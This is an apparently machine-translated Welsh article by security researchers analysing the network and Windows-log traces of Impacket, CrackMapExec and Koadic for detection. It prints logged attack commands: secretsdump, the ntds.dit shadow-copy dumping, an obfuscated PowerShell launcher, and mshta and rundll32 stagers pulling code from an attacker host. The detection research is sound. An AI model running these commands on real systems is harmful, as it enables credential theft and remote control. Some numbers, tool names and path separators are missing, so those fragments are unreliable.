Mae nifer yr ymosodiadau yn y sector corfforaethol yn cynyddu bob blwyddyn: er enghraifft, nag yn 2016, ac ar ddiwedd 2018 — nag yn y cyfnod blaenorol. Gan gynnwys y rhai lle mai'r prif offeryn gweithio yw system weithredu Windows. Yn 2017-2018, APT Dragonfly, APT28, cynnal ymosodiadau ar lywodraeth a sefydliadau milwrol yn Ewrop, Gogledd America a Saudi Arabia. Ac fe wnaethon nhw ddefnyddio tri offeryn ar gyfer hyn - , и . Mae eu cod ffynhonnell ar agor ac ar gael ar GitHub.
Mae'n werth nodi nad yw'r offer hyn yn cael eu defnyddio ar gyfer treiddiad cychwynnol, ond ar gyfer datblygu ymosodiad o fewn y seilwaith. Mae ymosodwyr yn eu defnyddio ar wahanol gamau o'r ymosodiad yn dilyn treiddiad y perimedr. Mae hyn, gyda llaw, yn anodd ei ganfod ac yn aml dim ond gyda chymorth technoleg neu offer i . Mae'r offer yn darparu amrywiaeth o swyddogaethau, o drosglwyddo ffeiliau i ryngweithio â'r gofrestrfa a gweithredu gorchmynion ar beiriant anghysbell. Cynhaliom astudiaeth o'r offer hyn i bennu eu gweithgaredd rhwydwaith.
Beth oedd angen i ni ei wneud:
- Deall sut mae offer hacio yn gweithio. Darganfyddwch beth sydd angen i ymosodwyr fanteisio arno a pha dechnolegau y gallant eu defnyddio.
- Dewch o hyd i'r hyn nad yw offer diogelwch gwybodaeth yn ei ganfod yng nghamau cyntaf ymosodiad. Gellir hepgor y cam rhagchwilio, naill ai oherwydd bod yr ymosodwr yn ymosodwr mewnol, neu oherwydd bod yr ymosodwr yn manteisio ar ddiffyg yn y seilwaith nad oedd yn hysbys o'r blaen. Daw'n bosibl adfer cadwyn gyfan ei weithredoedd, felly mae'r awydd i ganfod symudiad pellach yn codi.
- Dileu positifau ffug o offer canfod ymyrraeth. Rhaid inni beidio ag anghofio, pan fydd rhai gweithredoedd yn cael eu darganfod ar sail cudd-wybodaeth yn unig, mae gwallau aml yn bosibl. Fel arfer yn y seilwaith mae yna nifer ddigonol o ffyrdd, na ellir eu gwahaniaethu oddi wrth gyfreithlon ar yr olwg gyntaf, i gael unrhyw wybodaeth.
Beth mae'r offer hyn yn ei roi i ymosodwyr? Os yw'n Impacket, yna mae'r ymosodwyr yn cael llyfrgell fawr o fodiwlau y gellir eu defnyddio ar wahanol gamau o'r ymosodiad yn dilyn treiddiad y perimedr. Mae llawer o offer yn defnyddio modiwlau Ipacket yn fewnol, fel Metasploit. Mae ganddo dcomexec ac wmiexec i redeg gorchmynion o bell, secretsdump i ychwanegu cyfrifon cof o Impacket. O ganlyniad, bydd canfod gweithgaredd llyfrgell o'r fath yn gywir yn sicrhau y gellir canfod deilliadau.
Ynglŷn â CrackMapExec (neu yn syml CME), ysgrifennodd y crewyr “Powered by Ipacket” am reswm. Yn ogystal, mae gan CME ymarferoldeb parod ar gyfer senarios poblogaidd: dyma Mimikatz ar gyfer cael cyfrineiriau neu eu hashes, a chyflwyno Meterpreter neu asiant Empire ar gyfer gweithredu o bell, a Bloodhound ar fwrdd y llong.
Ein trydydd offeryn o ddewis yw Koadic. Mae'n eithaf ffres, fe'i cyflwynwyd yn y gynhadledd haciwr rhyngwladol DEFCON 25 yn 2017 ac mae ganddo ddull ansafonol: mae'n gweithio trwy HTTP, Java Script a Microsoft Visual Basic Script (VBS). Gelwir y dull hwn yn byw oddi ar y tir: mae'r offeryn yn defnyddio set o ddibyniaethau a llyfrgelloedd sydd wedi'u cynnwys yn Windows. Mae'r crewyr yn ei alw'n COM Command & Control, neu C3.
IMPACKET
Mae ymarferoldeb Impacket yn eang iawn, yn amrywio o rhagchwilio o fewn AD a chasglu data o weinyddion MS SQL mewnol, gan orffen gyda thechnegau ar gyfer cael tystlythyrau: mae hwn yn ymosodiad ras gyfnewid SMB, a chael y ffeil ntds.dit sy'n cynnwys hashes cyfrinair defnyddiwr o barth rheolydd. Mae Ipacket hefyd yn gweithredu gorchmynion o bell gan ddefnyddio pedwar dull gwahanol: trwy WMI, gwasanaeth i reoli'r amserlen Windows, DCOM a SMB, ac ar gyfer hyn mae angen tystlythyrau.
dymp cyfrinachol
Gadewch i ni edrych ar secretsdump. Mae hwn yn fodiwl sy'n gallu targedu peiriannau defnyddwyr a rheolwyr parth. Ag ef, gallwch gael copïau o ardaloedd cof LSA, SAM, SECURITY, NTDS.dit, fel y gellir ei weld ar wahanol gamau o'r ymosodiad. Y cam cyntaf yng ngweithrediad y modiwl yw dilysu trwy SMB, sy'n gofyn naill ai cyfrinair y defnyddiwr neu ei hash i gyflawni'r ymosodiad Pass the Hash yn awtomatig. Nesaf daw cais i agor mynediad i'r Rheolwr Rheoli Gwasanaeth (SCM) a chael mynediad i'r gofrestrfa gan ddefnyddio'r protocol winreg, gan ddefnyddio y gall yr ymosodwr ddarganfod data'r canghennau sydd o ddiddordeb iddo a chael y canlyniadau trwy SMB.
Ar ffig. 1 gwelwn yn union sut, wrth ddefnyddio'r protocol winreg, y ceir mynediad trwy allwedd cofrestrfa gyda'r LSA. I wneud hyn, defnyddiwch y gorchymyn DCERPC gyda opcode 15 - OpenKey.
Reis. 1. Agor allwedd gofrestrfa gan ddefnyddio'r protocol winreg
Ymhellach, pan geir mynediad trwy allwedd, mae'r gwerthoedd yn cael eu cadw gan y gorchymyn SaveKey gyda opcode 20. Mae Ipacket yn gwneud hyn mewn ffordd benodol iawn. Mae'n arbed y gwerthoedd i ffeil y mae ei henw yn llinyn o 8 nod ar hap gyda .tmp ynghlwm. Yn ogystal, dadlwythir y ffeil hon ymhellach trwy SMB o gyfeiriadur System32 (Ffig. 2).
Reis. 2. Cynllun ar gyfer cael allwedd cofrestrfa o beiriant anghysbell
Mae'n ymddangos y gallwch chi ganfod gweithgaredd o'r fath ar y rhwydwaith trwy gwestiynu rhai canghennau o'r gofrestrfa gan ddefnyddio'r protocol winreg, enwau penodol, gorchmynion a'u trefn.
Hefyd, mae'r modiwl hwn yn gadael olion yn log digwyddiadau Windows, y mae'n hawdd ei ganfod oherwydd hynny. Er enghraifft, o ganlyniad i weithredu'r gorchymyn
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCyn log Windows Server 2016 byddwn yn gweld y dilyniant allweddol canlynol o ddigwyddiadau:
1. 4624 - Logio o Bell.
2. 5145 - gwirio hawliau mynediad i wasanaeth pell winreg.
3. 5145 - gwirio'r hawliau mynediad i ffeil yn y cyfeiriadur System32. Mae gan y ffeil yr enw ar hap a grybwyllir uchod.
4. 4688 - creu proses cmd.exe sy'n lansio vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - creu proses gyda'r gorchymyn:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - creu proses gyda'r gorchymyn:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - creu proses gyda'r gorchymyn:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Fel llawer o offer ôl-fanteisio, mae gan Ipacket fodiwlau ar gyfer gweithredu gorchymyn o bell. Byddwn yn canolbwyntio ar smbexec, sy'n rhoi cragen gorchymyn rhyngweithiol i chi ar beiriant anghysbell. Mae'r modiwl hwn hefyd angen ei ddilysu trwy SMB gyda naill ai cyfrinair neu ei hash. Ar ffig. 3 gwelwn enghraifft o weithrediad offeryn o'r fath, yn yr achos hwn y consol gweinyddwr lleol ydyw.
Reis. 3. consol rhyngweithiol smbexec
Y cam cyntaf yn smbexec ar ôl dilysu yw agor y SCM gyda'r gorchymyn OpenSCManagerW(15). Mae'r ymholiad yn nodedig: mae ganddo faes MachineName wedi'i osod i DUMMY.
Reis. 4. Cais i agor Rheolwr Rheoli Gwasanaeth
Nesaf, mae'r gwasanaeth yn cael ei greu gan ddefnyddio'r gorchymyn CreateServiceW (12). Yn achos smbexec, gallwn weld yr un rhesymeg adeiladu gorchymyn bob tro. Ar ffig. Mae 5 lliw gwyrdd yn nodi paramedrau anghyfnewidiol y gorchymyn, melyn - yr hyn y gall yr ymosodwr ei newid. Mae'n hawdd gweld y gellir newid enw'r ffeil gweithredadwy, ei gyfeiriadur a'r ffeil allbwn, ond mae'r gweddill yn llawer anoddach i'w newid heb dorri rhesymeg y modiwl Impacket.
Reis. 5. Cais i greu gwasanaeth gan ddefnyddio Rheolwr Rheoli Gwasanaeth
Mae Smbexec hefyd yn gadael olion clir yn y log digwyddiad Windows. Yn y log Windows Server 2016 ar gyfer cragen gorchymyn rhyngweithiol gyda'r gorchymyn ipconfig, gwelwn y dilyniant allweddol canlynol o ddigwyddiadau:
1. 4697 - gosod y gwasanaeth ar beiriant y dioddefwr:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - creu'r broses cmd.exe gyda'r dadleuon o bwynt 1.
3. 5145 - gwirio'r hawliau mynediad i'r ffeil __output yn y cyfeiriadur C$.
4. 4697 - Gosod y gwasanaeth ar beiriant y dioddefwr.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - creu'r broses cmd.exe gyda'r dadleuon o bwynt 4.
6. 5145 - gwirio'r hawliau mynediad i'r ffeil __output yn y cyfeiriadur C$.
Impacket yw'r sail ar gyfer datblygu offer ymosod. Mae'n cefnogi bron pob protocol yn seilwaith Windows ac ar yr un pryd mae ganddo ei nodweddion ei hun. Dyma geisiadau winreg penodol, a'r defnydd o'r API SCM gyda ffurfio nodweddiadol gorchmynion, a fformat enwau ffeiliau, a rhannu SMB SYSTEM32.
CRACKMAPEXEC
Mae'r offeryn CME wedi'i gynllunio'n bennaf i awtomeiddio'r gweithredoedd arferol hynny y mae'n rhaid i ymosodwr eu cyflawni er mwyn symud ymlaen o fewn y rhwydwaith. Mae'n caniatáu ichi weithio ar y cyd ag asiant drwg-enwog yr Ymerodraeth a Meterpreter. Er mwyn gweithredu gorchmynion yn anweledig, gall CME eu cuddio. Gan ddefnyddio Bloodhound (offeryn rhagchwilio ar wahân), gall ymosodwr awtomeiddio'r chwiliad am sesiwn gweinyddwr parth gweithredol.
Bloodhound
Mae Bloodhound fel offeryn arunig yn caniatáu ichi gynnal rhagchwilio datblygedig o fewn y rhwydwaith. Mae'n casglu data am ddefnyddwyr, peiriannau, grwpiau, sesiynau ac yn dod fel sgript PowerShell neu ddeuaidd. Defnyddir LDAP neu brotocolau yn seiliedig ar SMB i gasglu gwybodaeth. Mae'r modiwl integreiddio CME yn caniatáu ichi lawrlwytho Bloodhound i beiriant y dioddefwr, ei redeg a derbyn y data a gasglwyd ar ôl ei weithredu, a thrwy hynny awtomeiddio'r gweithredoedd yn y system a'u gwneud yn llai amlwg. Mae cragen graffigol Bloodhound yn cyflwyno'r data a gasglwyd ar ffurf graffiau, sy'n eich galluogi i ddod o hyd i'r llwybr byrraf o beiriant yr ymosodwr i'r gweinyddwr parth.
Reis. 6. Rhyngwyneb Bloodhound
I redeg ar beiriant y dioddefwr, mae'r modiwl yn creu tasg gan ddefnyddio ATSVC a SMB. Mae ATSVC yn rhyngwyneb ar gyfer gweithio gyda'r Windows Task Scheduler. Mae'r CME yn defnyddio ei swyddogaeth NetrJobAdd(1) i greu swyddi dros y rhwydwaith. Dangosir enghraifft o'r hyn y mae'r modiwl CME yn ei anfon yn ffig. 7: mae hwn yn alwad i'r gorchymyn cmd.exe a chod obfuscated ar ffurf dadleuon mewn fformat XML.
Ffig.7. Creu tasg trwy CME
Ar ôl i'r dasg gael ei chyflwyno i'w chyflawni, mae peiriant y dioddefwr yn cychwyn y Bloodhound ei hun, a gellir gweld hyn yn y traffig. Nodweddir y modiwl gan ymholiadau LDAP ar gyfer cael grwpiau safonol, rhestr o'r holl beiriannau a defnyddwyr yn y parth, cael gwybodaeth am sesiynau defnyddwyr gweithredol trwy gais SRVSVC NetSessEnum.
Reis. 8. Cael rhestr o sesiynau gweithredol trwy'r SMB
Yn ogystal, mae digwyddiad gydag ID 4688 (creu proses) ac enw'r broses yn cyd-fynd â dechrau Bloodhound ar beiriant y dioddefwr gydag archwilio wedi'i alluogi «C:WindowsSystem32cmd.exe». Yn nodedig ynddo mae'r dadleuon llinell orchymyn:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "enum_avproducts
Mae'r modiwl enum_avproducts yn ddiddorol iawn o safbwynt ymarferoldeb a gweithrediad. Mae WMI yn caniatáu ichi ddefnyddio iaith ymholiad WQL i gael data o amrywiol wrthrychau Windows, sef yr hyn y mae'r modiwl CME hwn yn ei ddefnyddio yn ei hanfod. Mae'n cynhyrchu ymholiadau i'r dosbarthiadau AntiSpywareProduct ac AntiMirusProduct am yr offer amddiffyn sydd wedi'u gosod ar beiriant y dioddefwr. Er mwyn cael y data gofynnol, mae'r modiwl yn cysylltu â gofod enw rootSecurityCenter2, yna'n cynhyrchu ymholiad WQL ac yn derbyn ymateb. Ar ffig. 9 yn dangos cynnwys ceisiadau ac ymatebion o'r fath. Yn ein hesiampl, darganfuwyd Windows Defender.
Reis. 9. Gweithgaredd rhwydwaith modiwl enum_avproducts
Yn aml, gellir diffodd archwilio WMI (Trace WMI-Activity), lle gallwch ddod o hyd i wybodaeth ddefnyddiol am ymholiadau WQL. Ond os yw wedi'i alluogi, yna os yw'r sgript enum_avproducts yn cael ei redeg, bydd digwyddiad gydag ID 11 yn cael ei storio. Bydd yn cynnwys enw'r defnyddiwr a gyflwynodd y cais, a'r enw yn y gofod enw rootSecurityCenter2.
Roedd gan bob un o'r modiwlau CME ei arteffactau ei hun, boed yn ymholiadau WQL penodol neu'n creu math penodol o dasg yn y rhaglennydd tasgau gyda gorbwysedd a gweithgaredd Bloodhound-benodol yn LDAP a SMB.
KOADIG
Nodwedd arbennig o Koadic yw'r defnydd o ddehonglwyr JavaScript a VBScript yn Windows. Yn yr ystyr hwn, mae'n dilyn y duedd o fyw oddi ar y tir - hynny yw, nid oes ganddo ddibyniaethau allanol ac mae'n defnyddio offer Windows safonol. Offeryn yw hwn ar gyfer Gorchymyn a Rheoli llawn (CnC), oherwydd ar ôl haint, gosodir "mewnblaniad" ar y peiriant, gan ganiatáu iddo gael ei reoli. Gelwir peiriant o'r fath, mewn terminoleg Koadic, yn "zombie". Os nad oes digon o freintiau i weithio'n llawn ar ochr y dioddefwr, mae gan Koadic y gallu i'w codi gan ddefnyddio technegau ffordd osgoi Rheoli Cyfrif Defnyddiwr (ffordd osgoi UAC).
Reis. 10. Koadic cragen gorchymyn
Rhaid i'r dioddefwr ddechrau cyfathrebu â'r gweinydd Command & Control. I wneud hyn, mae angen iddi gael mynediad at URI a baratowyd ymlaen llaw a chael y prif gorff Koadic gan ddefnyddio un o'r llwyfanwyr. Ar ffig. Mae 11 yn dangos enghraifft ar gyfer y stager mshta.
Reis. 11. Cychwyn y sesiwn gyda'r gweinydd CNC
Erbyn newidyn WS yr ymateb, daw'n amlwg bod y gweithrediad yn digwydd trwy WScript.Shell, ac mae'r newidynnau STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE yn cynnwys gwybodaeth allweddol am baramedrau'r sesiwn gyfredol. Dyma'r pâr cais-ymateb cyntaf yn y cysylltiad HTTP i'r gweinydd CNC. Mae ceisiadau dilynol yn uniongyrchol gysylltiedig ag ymarferoldeb y modiwlau a elwir (mewnblaniadau). Dim ond gyda sesiwn CNC weithredol y mae holl fodiwlau Koadic yn gweithio.
Mimikatz
Yn union fel mae CME yn gweithio gyda Bloodhound, mae Koadic yn gweithio gyda Mimikatz fel rhaglen ar wahân ac mae ganddo sawl ffordd i'w rhedeg. Isod mae pâr cais-ymateb ar gyfer lawrlwytho mewnblaniad Mimikatz.
Reis. 12. Trosglwyddo Mimikatz i Koadic
Gallwch weld sut mae fformat yr URI yn y cais wedi newid. Mae ganddo werth ar gyfer y newidyn csrf, sy'n gyfrifol am y modiwl a ddewiswyd. Peidiwch talu sylw i'w henw; rydym i gyd yn gwybod bod CSRF fel arfer yn cael ei ddeall yn wahanol. Daeth yr un prif gorff o Koadic mewn ymateb, ac ychwanegwyd cod yn ymwneud â Mimikatz ato. Mae'n eithaf mawr, felly gadewch i ni edrych ar y pwyntiau allweddol. Dyma'r llyfrgell Mimikatz wedi'i hamgodio base64, y dosbarth .NET cyfresol a fydd yn ei chwistrellu, a'r dadleuon i redeg Mimikatz. Mae canlyniad y cyflawni yn cael ei drosglwyddo dros y rhwydwaith mewn testun clir.
Reis. 13. Canlyniad rhedeg Mimikatz ar beiriant anghysbell
Exec_cmd
Mae gan Koadic hefyd fodiwlau sy'n gallu gweithredu gorchmynion o bell. Yma byddwn yn gweld yr un dull cynhyrchu URI a'r newidynnau sid a csrf cyfarwydd. Yn achos y modiwl exec_cmd, ychwanegir cod at y corff sy'n gallu gweithredu gorchmynion cregyn. Dangosir y cod canlynol yn ymateb HTTP y gweinydd CNC.
Reis. 14. Cod mewnblaniad exec_cmd
Mae angen y newidyn GAWTUUGCFI gyda'r priodoledd WS cyfarwydd ar gyfer gweithredu cod. Gyda'i help, mae'r mewnblaniad yn galw'r gragen, gan brosesu dwy gangen cod - shell.exec gyda dychwelyd y ffrwd data allbwn a shell.run heb ddychwelyd.
Nid yw Koadic yn offeryn nodweddiadol, ond mae ganddo ei arteffactau ei hun y gellir ei ddarganfod mewn traffig cyfreithlon:
- ffurfio arbennig o geisiadau HTTP,
- defnyddio'r winHttpRequests API,
- creu gwrthrych WScript.Shell trwy ActiveXObject,
- corff gweithredadwy mawr.
Mae'r cysylltiad cychwynnol yn cychwyn y llwyfan, felly mae'n bosibl canfod ei weithgaredd trwy ddigwyddiadau Windows. Ar gyfer mshta, dyma ddigwyddiad 4688, sy'n nodi creu proses gyda'r priodoledd cychwyn:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Yn ystod dienyddiad Koadic, gellir gweld digwyddiadau 4688 eraill gyda nodweddion sy'n ei nodweddu'n berffaith:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Canfyddiadau
Mae'r duedd byw oddi ar y tir yn dod yn fwy poblogaidd ymhlith seiberdroseddwyr. Maent yn defnyddio'r offer Windows a'r mecanweithiau adeiledig ar gyfer eu hanghenion. Rydym yn gweld yr offer poblogaidd Koadic, CrackMapExec ac Impacket yn dilyn yr egwyddor hon yn ymddangos yn amlach ac yn amlach mewn adroddiadau APT. Mae nifer y ffyrc ar GitHub ar gyfer yr offer hyn hefyd yn tyfu, mae rhai newydd yn ymddangos (mae tua mil ohonyn nhw nawr). Mae'r duedd yn dod yn fwy poblogaidd oherwydd ei symlrwydd: nid oes angen offer trydydd parti ar ymosodwyr, maent eisoes ar beiriannau dioddefwyr ac yn helpu i osgoi mesurau diogelwch. Rydym yn canolbwyntio ar astudio rhyngweithio rhwydwaith: mae pob offeryn a ddisgrifir uchod yn gadael ei olion mewn traffig rhwydwaith; roedd eu hastudiaeth fanwl yn caniatáu inni ddysgu ein cynnyrch i’w canfod, sydd yn y pen draw yn helpu i ymchwilio i’r gadwyn gyfan o ddigwyddiadau seiber sy’n ymwneud â nhw.
Awduron:
- Anton Tyurin, Pennaeth Adran Gwasanaethau Arbenigol, Canolfan Ddiogelwch Arbenigol PT, Technolegau Cadarnhaol
- Egor Podmokov, arbenigwr, Canolfan Ddiogelwch Arbenigol PT, Technolegau Cadarnhaol
Ffynhonnell: hab.com